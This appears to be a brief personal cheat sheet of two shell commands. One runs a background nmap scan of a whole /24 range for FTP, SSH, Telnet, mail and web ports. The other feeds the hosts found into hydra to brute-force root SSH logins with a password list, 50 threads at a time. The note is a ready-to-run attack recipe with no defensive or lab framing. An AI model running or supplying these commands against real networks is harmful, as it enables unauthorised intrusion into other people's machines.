IP scan:
nohup nmap -A -T4 -sS -p T:21-25,69,80,8080,110,65301 {domainname}/24 --host-timeout 600000 --min-hostgroup 50 -oN targets &
password scan:
nohup hydra -l root -P ./workingpass -f -v -o out.txt -t 50 -M targets ssh2 &